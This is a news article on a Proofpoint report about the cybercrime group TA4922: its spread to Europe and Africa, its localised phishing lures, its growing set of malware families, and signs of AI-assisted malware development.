TA4922, a suspected Chinese-speaking cybercrime group tracked by Proofpoint, has expanded its operations beyond East Asia and is now targeting organisations across Europe and Africa while deploying a growing range of malware families and social engineering tactics.
According to Proofpoint researchers, the actor has significantly increased its operational tempo since March 2026 and is using a wider collection of malware that includes Atlas RAT, RomulusLoader, SilentRunLoader and variants of Winos4.0, also known as ValleyRAT. The group is assessed to be financially motivated and focused on obtaining access to victim environments for purposes such as fraud, data theft, access resale and persistent access.
Global expansion
Proofpoint first observed the group conducting campaigns primarily against organisations in Japan and other parts of Asia, including Taiwan, South Korea, Singapore and India. More recent activity has extended into the United Kingdom, Germany, Italy and South Africa.
The actor relies heavily on localised lures that match regional language and business practices. Messages frequently impersonate human resources departments, finance teams, tax authorities or invoicing services. Campaigns are generally small to medium in size, ranging from several hundred to several thousand targets.
Proofpoint said TA4922 also conducts credential phishing and impersonation campaigns that attempt to move conversations from email into messaging platforms such as LINE, WhatsApp and Microsoft Teams. Once communications shift to those channels, the actor can continue social engineering activity outside traditional email security controls.
Malware growth
The report highlights a substantial increase in the group's malware arsenal during 2026.
Atlas RAT emerged as a new remote access tool used in multiple campaigns targeting organisations in Japan, the United Kingdom and Germany. The malware is delivered through DLL sideloading techniques and supports capabilities including system reconnaissance, file transfers, keylogging, screenshot capture, webcam access and audio recording.
Researchers also identified RomulusLoader, a newly named malware family written in C. The loader downloads and executes additional payloads from command-and-control infrastructure. It uses techniques such as process injection, RC4 encryption, dynamic API resolution and process hollowing to evade detection and maintain persistence.
In several campaigns, RomulusLoader was used to install legitimate remote monitoring and management software including AnyDesk and SyncFuture. Proofpoint noted that cybercriminals increasingly abuse legitimate administrative tools because they can blend into normal network activity.
Another newly identified payload, SilentRunLoader, was observed targeting organisations in the United Kingdom and Southeast Asia. The Python-based malware steals Chrome browser credentials, cookies and browsing data before transmitting the information to attacker-controlled infrastructure.
AI-assisted development
Proofpoint's analysis suggests the group may be using large language models to accelerate malware development.
Researchers identified placeholder values and coding artefacts inside SilentRunLoader, including a hardcoded API key labelled "your_secret_key_here". The company said these characteristics indicate the malware was likely generated or assisted by AI tools.
The report noted that TA4922 appears to be introducing new malware variants at a rapid pace, particularly among Python-based payloads, supporting the assessment that AI-assisted development may be helping the group expand its tooling quickly.
Regional targeting
Despite the broader geographic reach, Proofpoint said the actor remains disciplined in tailoring campaigns to local audiences.
Tax audit notices were used against German organisations. Payroll notifications targeted companies in Germany and Japan. Benefits and compliance-themed messages were directed at organisations across Southeast Asia and the United Kingdom. Invoicing and customer service themes also appeared in several campaigns.
The report concludes that TA4922 is conducting more unique campaigns than any other cybercrime actor currently tracked within Proofpoint's threat intelligence data. Researchers said the group combines targeted social engineering, multiple malware families, legitimate software and cloud-hosted infrastructure to increase effectiveness while complicating detection efforts.
"TA4922 currently conducts more unique campaigns than any other tracked cybercrime threat actor in Proofpoint threat data, demonstrating high operational tempo, a variety of lures, and multiple objectives," said the Proofpoint Threat Research Team.